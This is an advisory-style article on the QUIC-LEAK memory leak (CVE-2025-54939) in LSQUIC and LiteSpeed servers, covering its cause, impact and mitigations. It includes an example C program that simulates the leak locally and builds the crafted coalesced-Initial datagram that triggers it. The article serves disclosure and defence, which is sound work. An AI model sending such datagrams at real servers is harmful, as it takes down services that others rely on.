Critical QUIC-LEAK Vulnerability Exposes Servers to Memory Exhaustion and Denial-of-Service Attacks

A security flaw in the LSQUIC QUIC implementation, tracked as CVE-2025-54939 and dubbed QUIC-LEAK, lets a remote, unauthenticated attacker exhaust server memory and cause a Denial-of-Service (DoS) condition. LSQUIC is the second most widely used QUIC implementation worldwide, and the LiteSpeed products built on it account for over 34% of HTTP/3-enabled websites, so the exposure is broad.

Understanding the QUIC-LEAK Vulnerability

QUIC-LEAK stems from how LSQUIC handles coalesced QUIC packets carried in a single UDP datagram before any connection handshake has completed. An attacker crafts UDP datagrams containing several coalesced QUIC Initial packets in which only the first carries a valid Destination Connection ID (DCID); the packets that follow carry invalid DCIDs.

In lsquic_engine.c, LSQUIC recognises the packets whose DCID does not match, discards them, and adds their size to a garbage counter (a measure against amplification attacks). The flaw is that the discarded packets' packet_in structures are never returned with lsquic_mm_put_packet_in, so every discarded packet leaks its structure, and the leak persists for the life of the process.

Each leaked packet_in structure costs roughly 96 bytes of RAM. A single UDP datagram can carry up to 10 coalesced packets, so an attacker can grow the server's memory at about 70% of the bandwidth they send. Because the leak happens before any connection exists, the attack bypasses QUIC's connection-level protections (connection limits, stream limits and flow control), which only apply once a handshake has completed.
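The mechanism above, as an added example that is not LSQUIC's own code: a simplified C model with a fixed pool of packet_in structures (the real library pools them through lsquic_mm), a parser for coalesced long-header Initial packets, and a dispatch loop in which the `fixed` flag toggles whether a mismatched-DCID packet's structure is returned to the pool. All names here (`get_packet_in`, `process_datagram`, `build_probe`, the pool size of 64) are this example's own assumptions, and the attack datagrams are constructed inline.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical, simplified model of LSQUIC's pre-handshake packet dispatch (not the
 * project's code): a fixed pool of packet_in structs, a coalesced-Initial parser, and a
 * dispatch loop whose leak is toggled by the `fixed` flag. */
#define POOL_SLOTS 64
#define MAX_CID    20

struct packet_in { uint8_t dcid[MAX_CID]; size_t dcid_len; };

static struct packet_in pool[POOL_SLOTS];
static int in_use[POOL_SLOTS];
static size_t live_packet_ins;              /* structs currently checked out of the pool */

static void reset_pool(void) { memset(in_use, 0, sizeof in_use); live_packet_ins = 0; }

static struct packet_in *get_packet_in(void) {
    for (int i = 0; i < POOL_SLOTS; i++)
        if (!in_use[i]) { in_use[i] = 1; live_packet_ins++; return &pool[i]; }
    return NULL;                            /* pool exhausted: the DoS condition */
}

static void put_packet_in(struct packet_in *p) {   /* stands in for lsquic_mm_put_packet_in */
    if (p && in_use[p - pool]) { in_use[p - pool] = 0; live_packet_ins--; }
}

/* QUIC variable-length integer (RFC 9000, section 16); returns bytes consumed, 0 on error. */
static size_t read_varint(const uint8_t *b, size_t n, uint64_t *out) {
    if (n == 0) return 0;
    size_t len = (size_t)1 << (b[0] >> 6);
    if (len > n) return 0;
    uint64_t v = b[0] & 0x3f;
    for (size_t i = 1; i < len; i++) v = (v << 8) | b[i];
    *out = v;
    return len;
}

/* Parse one long-header Initial packet at b[0..n); returns its size, 0 if malformed. */
static size_t parse_initial(const uint8_t *b, size_t n, struct packet_in *p) {
    uint64_t v; size_t k, off = 5;          /* first byte + 4-byte version */
    if (n < 7 || (b[0] & 0xC0) != 0xC0 || ((b[0] >> 4) & 3) != 0) return 0;
    p->dcid_len = b[off++];
    if (p->dcid_len > MAX_CID || off + p->dcid_len > n) return 0;
    memcpy(p->dcid, b + off, p->dcid_len); off += p->dcid_len;
    if (off >= n || off + 1 + b[off] > n) return 0;
    off += 1 + b[off];                      /* skip SCID */
    if (!(k = read_varint(b + off, n - off, &v)) || off + k + v > n) return 0;
    off += k + v;                           /* token length + token */
    if (!(k = read_varint(b + off, n - off, &v)) || off + k + v > n) return 0;
    return off + k + v;                     /* Length covers packet number + payload */
}

/* Dispatch every coalesced packet of one datagram. Packets whose DCID differs from the
 * first packet's are counted as garbage; with fixed == 0 their packet_in is never returned
 * to the pool (the CVE-2025-54939 pattern). Returns garbage packets, or -1 if the pool ran dry. */
static int process_datagram(const uint8_t *d, size_t n, int fixed) {
    uint8_t first[MAX_CID]; size_t first_len = 0, off = 0; int seen = 0, garbage = 0;
    while (off < n) {
        struct packet_in *p = get_packet_in();
        if (!p) return -1;
        size_t sz = parse_initial(d + off, n - off, p);
        if (!sz) { put_packet_in(p); break; }   /* trailing junk: stop */
        off += sz;
        if (!seen) {                        /* first packet: handed to the connection layer */
            memcpy(first, p->dcid, p->dcid_len); first_len = p->dcid_len; seen = 1;
            put_packet_in(p);               /* released once the connection is done with it */
        } else if (p->dcid_len != first_len || memcmp(p->dcid, first, first_len)) {
            garbage++;                      /* mismatched DCID: discarded */
            if (fixed) put_packet_in(p);    /* the fix: return the struct before moving on */
        } else {
            put_packet_in(p);
        }
    }
    return garbage;
}

/* Serialise one Initial: version 1, empty SCID, no token, 1-byte packet number, zero-filled
 * payload (zero bytes are PADDING frames). Header is 11 + dcid_len bytes. */
static size_t build_initial(uint8_t *out, const uint8_t *dcid, size_t dcid_len, size_t payload) {
    size_t off = 0, len = 1 + payload;      /* packet number + payload */
    out[off++] = 0xC0;                      /* long header, fixed bit, type Initial, pn len 1 */
    out[off++] = 0; out[off++] = 0; out[off++] = 0; out[off++] = 1;
    out[off++] = (uint8_t)dcid_len; memcpy(out + off, dcid, dcid_len); off += dcid_len;
    out[off++] = 0;                         /* SCID length */
    out[off++] = 0;                         /* token length */
    out[off++] = 0x40 | (uint8_t)(len >> 8); out[off++] = (uint8_t)len;   /* 2-byte varint */
    out[off++] = 0;                         /* packet number */
    memset(out + off, 0, payload);
    return off + payload;
}

/* Constructed attack datagram: `count` coalesced Initials, only the first with the DCID the
 * server recognises; the last is padded so the datagram meets the 1200-byte Initial minimum. */
static size_t build_probe(uint8_t *out, size_t cap, unsigned count) {
    static const uint8_t good_dcid[8] = {1, 2, 3, 4, 5, 6, 7, 8};
    uint8_t bogus[8]; size_t off = 0;
    for (unsigned i = 0; i < count; i++) {
        memset(bogus, 0xA0 + i, sizeof bogus);
        size_t payload = 8;                 /* 19-byte header + 8 = 27 bytes per packet */
        if (i + 1 == count && cap > off + 19 + payload) payload = cap - off - 19;
        off += build_initial(out + off, i ? bogus : good_dcid, 8, payload);
    }
    return off;
}

/* packet_in structs still checked out after one 10-packet probe. */
static size_t leaked_after_probe(int fixed) {
    uint8_t d[1200]; reset_pool();
    process_datagram(d, build_probe(d, sizeof d, 10), fixed);
    return live_packet_ins;
}

/* Send `probes` attack datagrams, then one ordinary single-packet Initial.
 * Returns 1 if the ordinary packet was still dispatched, 0 if the pool was exhausted. */
static int server_survives(unsigned probes, int fixed) {
    uint8_t d[1200]; reset_pool();
    for (unsigned i = 0; i < probes; i++)
        process_datagram(d, build_probe(d, sizeof d, 10), fixed);
    return process_datagram(d, build_probe(d, sizeof d, 1), fixed) >= 0;
}

int main(void) {
    printf("structs leaked per probe: unpatched %zu, patched %zu\n",
           leaked_after_probe(0), leaked_after_probe(1));
    printf("pool of %d still serves clients after 8 probes: unpatched %d, patched %d\n",
           POOL_SLOTS, server_survives(8, 0), server_survives(8, 1));
    return 0;
}
```

Each unpatched probe leaves nine structures checked out (the first packet is the only one released), and with a 64-slot pool the eighth probe is enough to stop a legitimate Initial from being processed; the patched loop survives any number of probes. The 96-byte figure and the 10-packet cap are the advisory's numbers, not derived from this model.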

Risk Factors and Impact

The QUIC-LEAK vulnerability poses several risks:

– Affected Products: The LSQUIC library before version 4.3.1, OpenLiteSpeed before 1.8.4, LiteSpeed Web Server before 6.3.4, and any other application that links the LiteSpeed QUIC library.

– Impact: A remote attacker can exhaust the server's memory and take the service down (Denial of Service). No code execution or data exposure is involved; the impact is on availability.

– Exploit Prerequisites: The attacker needs only the ability to deliver UDP datagrams to the server's QUIC port. No authentication, no valid QUIC session and no completed handshake is required, since the leak is triggered before the handshake.

– CVSS 3.1 Score: The vulnerability carries a CVSS 3.1 base score of 7.5 (High), the score the calculator yields for a network-reachable, unauthenticated flaw whose sole impact is on availability.

Mitigation Strategies

Given the high severity of the QUIC-LEAK vulnerability, immediate action is essential:

– Upgrade Affected Software: Upgrade to LSQUIC 4.3.1 or later; the fixed library ships in OpenLiteSpeed 1.8.4 and LiteSpeed Web Server 6.3.4. Restart the server afterwards so the patched binary is actually the one serving traffic, since memory already leaked by the old process is only reclaimed when that process exits.

– Implement Network-Level Protections: Where an upgrade cannot happen immediately, filter or rate-limit inbound UDP to the QUIC port (typically 443) at the firewall or load balancer. Blocking UDP/443 outright disables HTTP/3, and browsers fall back to HTTP/2 over TCP; per-source rate limiting keeps HTTP/3 available but only slows the attack, because the leak is cumulative and a distributed attacker can still drive memory up over time.

– Enforce Memory Usage Limits: Put a hard memory limit on the exposed service (for example a cgroup limit applied by the service manager) so that an exhausted process is killed and restarted by its supervisor rather than pushing the host into swap or taking neighbouring services down with it. This turns an outage into a brief restart; it does not remove the leak.

– Continuous Monitoring: Watch for traffic patterns that match the attack, such as datagrams on the QUIC port carrying several coalesced Initial packets with differing DCIDs, or a rising ratio of inbound UDP datagrams to established QUIC connections, and alert on steadily growing resident memory in the web server process, which is the symptom that precedes the outage.

Conclusion

QUIC-LEAK is a reminder that pre-handshake packet handling sits outside the protections QUIC builds around established connections, and that a small per-packet leak becomes a DoS once an attacker can trigger it without any session. Organizations running LSQUIC or LiteSpeed products should treat the upgrade as a priority; network-level filtering, memory limits and monitoring reduce the damage while the upgrade is scheduled but do not close the hole.